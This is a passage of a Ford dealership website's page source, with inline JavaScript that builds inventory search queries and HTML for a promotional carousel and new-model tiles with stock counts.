scrollableParts.length !== 0)) { if (show) { window.bodyScrollLock.clearAllBodyScrollLocks(); if (scrollableParts.length !== 0) { for (i = 0; i < scrollableParts.length; ++i) { window.bodyScrollLock.disableBodyScroll(scrollableParts[ i ]); } } else if (targetElement != null) { window.bodyScrollLock.disableBodyScroll(targetElement); } } else { window.bodyScrollLock.clearAllBodyScrollLocks(); } } jzlMergeState({ panels: { activePanel: show ? id : '' } }); } } window.jzlRocketBarButtonToggleActivePanel = function (id) { with (window.jzlBindHelpers) { var isVisible = h('panels.activePanel') !== id; setActivePanel(id, isVisible); } }; window.jzlRocketBarButtonShowPanel = function (id) { setActivePanel(id, true); }; window.jzlRocketBarButtonHidePanel = function (id) { setActivePanel(id, false); }; function setActiveBars(ids, show) { with (window.jzlBindHelpers) { jzlMergeState({ bars: { activeBars: show ? hf('bars.activeBars').concat(ids) : hf('bars.activeBars').filter(function(x) { return !ids.includes(x); }), } }); } } window.jzlRocketBarButtonShowBars = function(ids) { setActiveBars(ids, true); }; window.jzlRocketBarButtonHideBars = function(ids) { setActiveBars(ids, false); }; window.jzlRocketBarButtonToggleActiveBars = function(ids) { with (window.jzlBindHelpers) { const show = !hf('bars.activeBars').some(function(x) { return ids.includes(x); }); setActiveBars(ids, show); } }; function findRanges(values) { var lowestSeen = undefined; var highestSeen = undefined; var le = false; var ge = false; for (var i = 0; i < values.length; i++ ) { var value = values[i]; var pos = value.indexOf("-"); var value1 = undefined; var value2 = undefined; if (pos === -1) { value1 = parseInt(value, 10); value2 = parseInt(value, 10); } else if (pos === 0) { value2 = parseInt(value.slice(1), 10); } else if (pos === value.length - 1) { value1 = parseInt(value.slice(0, -1), 10); } else { value1 = parseInt(value.slice(0, pos), 10); value2 = parseInt(value.slice(pos + 1), 10); } if (!le) { if (value1 === undefined) { le = true; } else if (lowestSeen === undefined || value1 < lowestSeen) { lowestSeen = value1; } } if (!ge) { if (value2 === undefined) { ge = true; } else if (highestSeen === undefined || value2 > highestSeen) { highestSeen = value2; } } } var min = !le ? lowestSeen : null; var max = !ge ? highestSeen : null; return { min: min, max: max, }; } function uniqueFilter( predicate ) { var keys = new Set(); return function (item) { var key = predicate != null ? predicate(item) : item; if (!keys.has(key)) { keys.add(key); return true; } return false; }; } function pullItemToFront(array, item) { var result = array.slice(); var pos = array.indexOf(item); if (pos !== -1 && pos !== 0) { // don't bother if it's already at the front var movedItem = result.splice(pos, 1); result.unshift(movedItem); } return result; } function pullItemsToFront(array, items) { var result = array; var itemsReversed = items.slice().reverse(); for (var i = 0; i < itemsReversed.length; i++) { var item = itemsReversed[i]; result = pullItemToFront(result, item); } return result; } function sortTheConditions(conditions) { return pullItemsToFront(conditions, [ "New", "Certified" ]); } function buildConditionSegment(conditions) { if (Array.isArray(conditions) && conditions.length > 0) { var conditionsArray = sortTheConditions(conditions); var conditionValue = 'conditions=' + conditionsArray.join(","); switch (conditionValue) { case "conditions=New": conditionValue = "new"; break; case "conditions=Used": conditionValue = "used"; break; case "conditions=Certified,Used": conditionValue = "certified-used"; break; case "conditions=New,Certified,Used": conditionValue = "new-or-used"; break; } return conditionValue; } return ""; } function buildQuerySegments(params, options) { params = params || {}; options = options || { text: true, filters: true }; var text = options.text; var filters = options.filters; // Build query var querySegments = []; if (text) { // Text Search var textSearch = params.textSearch; if (Array.isArray(textSearch) && textSearch.length > 0) { var queryValue = 'text=' + textSearch.join(","); querySegments.push(queryValue); } } if (filters) { // Conditions var conditions = params.conditions; if (Array.isArray(conditions) && conditions.length > 0) { var conditionValue = buildConditionSegment(conditions); querySegments.push(conditionValue); } (function () { var modelsItems = []; var selectedMake = params.selectedMake; var selectedModel = params.selectedModel; var selectedTrim = params.selectedTrim; if (selectedMake != null) { var selectedModelItem = {}; selectedModelItem.make = selectedMake; if (selectedModel != null) { selectedModelItem.model = selectedModel; if (selectedTrim != null) { selectedModelItem.trim = selectedTrim; } } modelsItems.push(selectedModelItem); } var models = params.models; if (models != null) { for (var i = 0; i < models.length; i++) { var modelItem = models[ i ]; var modelSegments = modelItem.split("--"); var make = modelSegments[ 0 ]; var model = modelSegments[ 1 ]; var trim = modelSegments[ 2 ]; if (make != null) { var selectedModelItem = {}; selectedModelItem.make = make; if (model != null) { selectedModelItem.model = model; if (trim != null) { selectedModelItem.trim = trim; } } modelsItems.push(selectedModelItem); } } } var modelsQuerySegments = modelsItems.reduce(function (acc, modelsItem) { var modelsQuerySegments = acc.modelsQuerySegments; var make = modelsItem.make; var model = modelsItem.model; var trim = modelsItem.trim; if (make != null) { if (model != null) { if (trim != null) { modelsQuerySegments.push(make + '_' + model + '_' + trim); } else { modelsQuerySegments.push(make + '_' + model); } } else { modelsQuerySegments.push(make); } } return acc; }, { modelsQuerySegments: [], }).modelsQuerySegments; if (modelsQuerySegments.length > 0) { querySegments.push( "models=" + modelsQuerySegments .filter(function(x) { return x != null && x !== ""; }) .filter(uniqueFilter()) .join(",") ); } })(); // Year var years = params.years; if (Array.isArray(years) && years.length > 0) { var findRangesResult = findRanges(years); var min = findRangesResult.min; var max = findRangesResult.max; querySegments.push('years=' + (min != null ? min : "") + '-' + (max != null ? max : "")); } // Price Range var priceRange = params.priceRange; if (Array.isArray(priceRange) && priceRange.length > 0) { var findRangesResult = findRanges(priceRange); var min = findRangesResult.min; var max = findRangesResult.max; querySegments.push('price=' + (min != null ? min : "") + '-' + (max != null ? max : "")); } // Exterior Colors var exteriorColors = params.exteriorColors; if (Array.isArray(exteriorColors) && exteriorColors.length > 0) { const queryValue = 'exterior-color=' + exteriorColors.join(","); querySegments.push(queryValue); } // Interior Colors var interiorColors = params.interiorColors; if (Array.isArray(interiorColors) && interiorColors.length > 0) { const queryValue = 'interior-color=' + interiorColors.join(","); querySegments.push(queryValue); } // MPG City Range var mpgCityRange = params.mpgCityRange; if (Array.isArray(mpgCityRange) && mpgCityRange.length > 0) { var findRangesResult = findRanges(mpgCityRange); var min = findRangesResult.min; var max = findRangesResult.max; querySegments.push('mpg-city=' + (min != null ? min : "") + '-' + (max != null ? max : "")); } // MPG Highway Range var mpgHighwayRange = params.mpgHighwayRange; if (Array.isArray(mpgHighwayRange) && mpgHighwayRange.length > 0) { var findRangesResult = findRanges(mpgHighwayRange); var min = findRangesResult.min; var max = findRangesResult.max; querySegments.push('mpg-hwy=' + (min != null ? min : "") + '-' + (max != null ? max : "")); } // MPG Combined Range var mpgCombinedRange = params.mpgCombinedRange; if (Array.isArray(mpgCombinedRange) && mpgCombinedRange.length > 0) { var findRangesResult = findRanges(mpgCombinedRange); var min = findRangesResult.min; var max = findRangesResult.max; querySegments.push('mpg-combined=' + (min != null ? min : "") + '-' + (max != null ? max : "")); } // Mileage Range var mileageRange = params.mileageRange; if (Array.isArray(mileageRange) && mileageRange.length > 0) { var findRangesResult = findRanges(mileageRange); var min = findRangesResult.min; var max = findRangesResult.max; querySegments.push('mileage=' + (min != null ? min : "") + '-' + (max != null ? max : "")); } // Body Type var bodyTypes = params.bodyTypes; if (Array.isArray(bodyTypes) && bodyTypes.length > 0) { var queryValue = 'vehicle-type=' + bodyTypes.join(","); querySegments.push(queryValue); } // Drivetrains var drivetrains = params.drivetrains; if (Array.isArray(drivetrains) && drivetrains.length > 0) { var queryValue = 'drivetrain=' + drivetrains.join(","); querySegments.push(queryValue); } // Engine Cylinders var engineCylinders = params.engineCylinders; if (Array.isArray(engineCylinders) && engineCylinders.length > 0) { var queryValue = 'engine-cylinders=' + engineCylinders.join(","); querySegments.push(queryValue); } // Transmissions var transmissions = params.transmissions; if (Array.isArray(transmissions) && transmissions.length > 0) { var queryValue = 'transmission=' + transmissions.join(","); querySegments.push(queryValue); } // Fuel Types var fuelTypes = params.fuelTypes; if (Array.isArray(fuelTypes) && fuelTypes.length > 0) { var queryValue = 'fuel-type=' + fuelTypes.join(","); querySegments.push(queryValue); } // Passenger Capacities var passengers = params.passengers; if (Array.isArray(passengers) && passengers.length > 0) { var queryValue = 'passenger-capacity=' + passengers.join(","); querySegments.push(queryValue); } // Features var features = params.features; if (Array.isArray(features) && features.length > 0) { var queryValue = 'features=' + features.join(","); querySegments.push(queryValue); } // Cab Styles var cabStyles = params.cabStyles; if (Array.isArray(cabStyles) && cabStyles.length > 0) { var queryValue = 'cab-style=' + cabStyles.join(","); querySegments.push(queryValue); } // Generic Number 1 var genericNumber1 = params.genericNumber1; if (Array.isArray(genericNumber1) && genericNumber1.length > 0) { var queryValue = 'generic-number-1=' + genericNumber1.join(","); querySegments.push(queryValue); } // Generic Number 2 var genericNumber2 = params.genericNumber2; if (Array.isArray(genericNumber2) && genericNumber2.length > 0) { var queryValue = 'generic-number-2=' + genericNumber2.join(","); querySegments.push(queryValue); } // Generic Number 3 var genericNumber3 = params.genericNumber3; if (Array.isArray(genericNumber3) && genericNumber3.length > 0) { var queryValue = 'generic-number-3=' + genericNumber3.join(","); querySegments.push(queryValue); } // Generic Text 1 var genericText1Literal = params.genericText1Literal; if (Array.isArray(genericText1Literal) && genericText1Literal.length > 0) { var queryValue = 'generic-text-1-literal=' + genericText1Literal.join(","); querySegments.push(queryValue); } // Generic Text 2 var genericText2Literal = params.genericText2Literal; if (Array.isArray(genericText2Literal) && genericText2Literal.length > 0) { var queryValue = 'generic-text-2-literal=' + genericText2Literal.join(","); querySegments.push(queryValue); } // Generic Text 3 var genericText3Literal = params.genericText3Literal; if (Array.isArray(genericText3Literal) && genericText3Literal.length > 0) { var queryValue = 'generic-text-3-literal=' + genericText3Literal.join(","); querySegments.push(queryValue); } } return querySegments; } window.jzlRocketSearchBuildQuery = function(selectedFilters) { var querySegments = buildQuerySegments(selectedFilters); var query = querySegments.join("+"); return query; }; window.jzlRocketSearchAnyTextFilters = function(selectedFilters) { var querySegments = buildQuerySegments(selectedFilters, { text: true }); return querySegments.length > 0; }; window.jzlRocketSearchAnyFilters = function(selectedFilters) { var querySegments = buildQuerySegments(selectedFilters, { filters: true }); return querySegments.length > 0; }; })();</script><div id="content" class="site-content"><div id="primary" class="content-area"><main id="main" class="site-main"><article id="post-2" class="post-2 page type-page status-publish hentry"><!--<header class="entry-header">--><!-- --><!--</header><!-- .entry-header --> <div class="entry-content"><div class="vc_row wpb_row vc_row-fluid row-hero full-width no-padding priority-grid-a"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid hero-fts vc_custom_1537592031927"><div class="wpb_column vc_column_container vc_col-sm-12 vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_hidden-xs"><div class="vc_column-inner vc_custom_1538617112490"><div class="wpb_wrapper"> <div class="RocketFTSPage sc-gRnDUn jNHnWy"><div class="sc-exkUMo bumDSr"><form id="fts-form" method="GET" target="_top" action="//www.5starford.com/jzlrocket-nav/query/" class="sc-kcDeIU cdPWTB"><div class="sc-BngTV eYaUKI"><input type="hidden" name="srp_id" value="2088"><svg class="sc-bFADNz hqPbJw" fill="rgb(158, 158, 158)" viewBox="0 0 24 24" width="24" height="24"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"></path><path d="M0 0h24v24H0z" fill="none"></path></svg><input type="search" name="q" placeholder=" Search Inventory" height="40" data-jzlbind-change=" jzlAnalytics('ROCKET_FTS_SEARCH', { value: event.target.value }) " class="sc-cqpYsc euZBNF"><div role="button" tabindex="0" height="40" data-jzlbind-tap="jzlBindElement('fts-form').submit()" class="sc-hBbWxd ijAzrY">Go</div></div></form></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1538658223210"><div class="wpb_wrapper"><div class="sc-hBcjXN kCVBLn"><div class="RocketSliderRoot sc-hdNmWC irKvMx"><div class="sc-fPEBxH lddcBl"><div data-vars-component-type="carousel" data-slick="{&quot;autoplay&quot;:true,&quot;autoplaySpeed&quot;:&quot;6000&quot;,&quot;dots&quot;:true,&quot;arrows&quot;:true,&quot;nextArrow&quot;:&quot;<div class='slick-next'></div>&quot;,&quot;prevArrow&quot;:&quot;<div class='slick-prev'></div>&quot;,&quot;draggable&quot;:false,&quot;initialSlide&quot;:0}" class="sc-cKZAiZ RQukm"><a href="https://www.5starford.com/new-ford-specials-north-richland-hills-tx/" class="slide-index-0"><div class="sc-hzOKmB fVCADe"><div class="rocket-contain sc-dzVpKk dsfGqY"><img class="image__mobile-view sc-cOoQYZ hXfFQc" src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/service-slide-may-2019.jpg"><img class="image__desktop-view sc-cOoQYZ hXfFQc" src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/service-slide-may-2019.jpg"></div></div></a><a href="https://www.5starford.com/inventory/f-150/" class="slide-index-1"><div class="sc-hzOKmB hHwUnz"><div class="rocket-contain sc-dzVpKk dsfGqY"><img class="image__mobile-view sc-cOoQYZ hXfFQc" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/f150-slide-may-20193.jpg" data-jzlbind-image-lazy-ready="false"><img class="image__desktop-view sc-cOoQYZ hXfFQc" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/f150-slide-may-20193.jpg" data-jzlbind-image-lazy-ready="false"></div></div></a><a href="https://www.5starford.com/inventory/mustang/" class="slide-index-2"><div class="sc-hzOKmB dugcuu"><div class="rocket-contain sc-dzVpKk dsfGqY"><img class="image__mobile-view sc-cOoQYZ hXfFQc" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/mustang-slide-1533x51411.jpg" data-jzlbind-image-lazy-ready="false"><img class="image__desktop-view sc-cOoQYZ hXfFQc" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/mustang-slide-1533x51411.jpg" data-jzlbind-image-lazy-ready="false"></div></div></a><a href="https://www.5starford.com/new-ford-specials-north-richland-hills-tx/#explorer-" class="slide-index-3"><div class="sc-hzOKmB qJoNk"><div class="rocket-contain sc-dzVpKk dsfGqY"><img class="image__mobile-view sc-cOoQYZ hXfFQc" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/explorer-slide-may-20192.jpg" data-jzlbind-image-lazy-ready="false"><img class="image__desktop-view sc-cOoQYZ hXfFQc" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/explorer-slide-may-20192.jpg" data-jzlbind-image-lazy-ready="false"></div></div></a><a href="https://www.5starford.com/college-graduates-students/" class="slide-index-4"><div class="sc-hzOKmB dKDxog"><div class="rocket-contain sc-dzVpKk dsfGqY"><img class="image__mobile-view sc-cOoQYZ hXfFQc" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/collegestudent-may-20191.jpg" data-jzlbind-image-lazy-ready="false"><img class="image__desktop-view sc-cOoQYZ hXfFQc" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/collegestudent-may-20191.jpg" data-jzlbind-image-lazy-ready="false"></div></div></a><a href="https://www.kbb.com/instant-cash-offer/W/583414/43A6F9B8-DB6C-48C0-A360-F658B2176E3E" class="slide-index-5"><div class="sc-hzOKmB bPmYGi"><div class="rocket-contain sc-dzVpKk dsfGqY"><img class="image__mobile-view sc-cOoQYZ hXfFQc" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-jzlbind-image-src="https://images.jazelc.com/uploads/sampacksfivestarford-keith/ICO_CarouselAd_1514x514.jpg" data-jzlbind-image-lazy-ready="false"><img class="image__desktop-view sc-cOoQYZ hXfFQc" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-jzlbind-image-src="https://images.jazelc.com/uploads/sampacksfivestarford-keith/ICO_CarouselAd_1514x514.jpg" data-jzlbind-image-lazy-ready="false"></div></div></a></div></div></div></div></div></div></div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid full-width row-only no-padding priority-grid-a"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1466637490055"><div class="wpb_wrapper"><div class="c-58d2b975-9f59-4f3e-a894-ff3949562a49 sc-eitiEO lgoSIa" data-jzlbind-immediate="yes"><div class="sc-bIqbHp kERLEx"><div class="sc-jxGEyO ekbcyF"><div class="c-19487b37-fd75-43f9-ac96-c2765079b1ec tab-custom1 sc-cqPOvA fiYpi active sc-dEfkYy kjTeNF" data-jzlbind-class="'c-19487b37-fd75-43f9-ac96-c2765079b1ec tab-custom1 sc-cqPOvA fiYpi ' + (h('hpsm_ui_state.currentTab') == &quot;custom1&quot; ? 'active' : '')"><div role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ hpsm_ui_state: {currentTab: 'custom1'} }) " class="sc-gacfCG VKwuj"><span>Shop New Vehicles</span></div></div><div class="c-19487b37-fd75-43f9-ac96-c2765079b1ec tab-used_vehicles sc-cqPOvA fiYpi sc-dEfkYy kjTeNF" data-jzlbind-class="'c-19487b37-fd75-43f9-ac96-c2765079b1ec tab-used_vehicles sc-cqPOvA fiYpi ' + (h('hpsm_ui_state.currentTab') == &quot;used_vehicles&quot; ? 'active' : '')"><div role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ hpsm_ui_state: {currentTab: 'used_vehicles'} }) " class="sc-gacfCG VKwuj"><span>Shop Used Vehicles</span></div></div><div class="c-19487b37-fd75-43f9-ac96-c2765079b1ec tab-price_range sc-cqPOvA fiYpi sc-dEfkYy kjTeNF" data-jzlbind-class="'c-19487b37-fd75-43f9-ac96-c2765079b1ec tab-price_range sc-cqPOvA fiYpi ' + (h('hpsm_ui_state.currentTab') == &quot;price_range&quot; ? 'active' : '')"><div role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ hpsm_ui_state: {currentTab: 'price_range'} }) " class="sc-gacfCG VKwuj"><span>Shop Price</span></div></div><div class="c-19487b37-fd75-43f9-ac96-c2765079b1ec tab-vehicle_type sc-cqPOvA fiYpi sc-dEfkYy kjTeNF" data-jzlbind-class="'c-19487b37-fd75-43f9-ac96-c2765079b1ec tab-vehicle_type sc-cqPOvA fiYpi ' + (h('hpsm_ui_state.currentTab') == &quot;vehicle_type&quot; ? 'active' : '')"><div role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ hpsm_ui_state: {currentTab: 'vehicle_type'} }) " class="sc-gacfCG VKwuj"><span>Shop Body Type</span></div></div></div></div><div class="sc-bqjOQT bfVDLi"><div class="sc-crNyjn jPXHzd standard-tab sc-jkCMRl dwvblY" data-jzlbind-class="'sc-crNyjn jPXHzd ' + (h('hpsm_ui_state.currentTab').indexOf(&quot;custom&quot;) == -1 ? &quot;standard-tab&quot; : &quot;custom-tab&quot;)"><div class="sc-nrwXf gzDfhW active-tab-custom1 sc-cpHetk didcdr" data-jzlbind-class="'sc-nrwXf gzDfhW ' + ( [&quot;custom1&quot;,&quot;used_vehicles&quot;,&quot;price_range&quot;,&quot;vehicle_type&quot;].map( function(name) { return name == h('hpsm_ui_state.currentTab') ? &quot;active-tab-&quot; + name : &quot;&quot; } ).join(&quot; &quot;) )"><div class="tab-custom1 sc-dznXNo eHUZJx"><div><span id="docs-internal-guid-bf96a6ac-7fff-10ba-bbe6-d680dcab4c47"><span style="font-size: 10.5pt; font-family: Verdana; font-variant-numeric: normal; font-variant-east-asian: normal; vertical-align: baseline; white-space: pre-wrap;"><div class="sc-iKiVwC gIZPUr"><h1 class="sc-guDjWT iQJPhO"></h1><div class="sc-bWFPNQ bsttxx"><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Fiesta" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="Fiesta" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/Fiesta.png"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">Fiesta (23)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Fusion,Ford_Fusion Energi,Ford_Fusion Hybrid,Ford_Fusion SE" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="Fusion" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://a5-gallery.s3-us-west-2.amazonaws.com/2019/Ford/Fusion/Base/front34/sm/D2CECE"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">Fusion (66)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Mustang,Ford_Mustang Roush,Ford_Mustang Shelby GT Heritage Edtion,Ford_Mustang Shelby Heritage Edition,Ford_Mustang Shelby Wide Body Mustang,Ford_Roush Mustang" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="Mustang" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/Mustang1.png"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">Mustang (41)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Taurus" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="Taurus" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/Taurus_white.png"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">Taurus (6)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Ecosport" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="EcoSport" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/Ecosport_black.png"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">EcoSport (52)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Escape" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="Escape" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/Escape_orange.png"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">Escape (122)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Edge" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="Edge" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/Edge.png"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">Edge (69)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Flex" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="Flex" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://a5-gallery.s3-us-west-2.amazonaws.com/2018/Ford/Flex/SEL/front34/sm/D2CECE"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">Flex (5)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Explorer,Ford_Explorer XLT" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="Explorer" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/Explorer_black.png"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">Explorer (146)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Expedition,Ford_Expedition EL,Ford_Expedition MAX" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="Expedition" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" data-jzlbind-image-src="https://a5-gallery.s3-us-west-2.amazonaws.com/2019/Ford/Expedition/Base/front34/sm/D2CECE"></div><div font-weight="400" class="sc-iUVpnZ jJLJmm">Expedition (24)</div></a></div><div class="sc-kOnlKp hXToPs"><a href="/inventory/new-vehicles/models=Ford_Black Widow F-150,Ford_F-150,Ford_F-150 Police Responder,Ford_F-150 Raptor,Ford_F-150 SCA Black Widow Military Edition,Ford_F-150 SCA Raptor,Ford_F-150 Shelby Baja,Ford_F-150 Shelby Baja Raptor,Ford_F-150 Shelby OFF Road,Ford_F-150 Shelby OFF-Road,Ford_F-150 XLT Supercab 6.5' Box EcoBoost®,Ford_F-150 XLT With Roush Package,Ford_Lifted F-150,Ford_Shelby F-150" class="sc-klSiHT SPDPo"><div class="sc-jJkQYJ hQpEJA"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-fallback-src="https://rocket-prod.jazelc.com:29620/amp-static/images/no-vehicle-image.png" alt="F-150" width="auto" height="auto" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="sc-cLQEGU laMIkr" 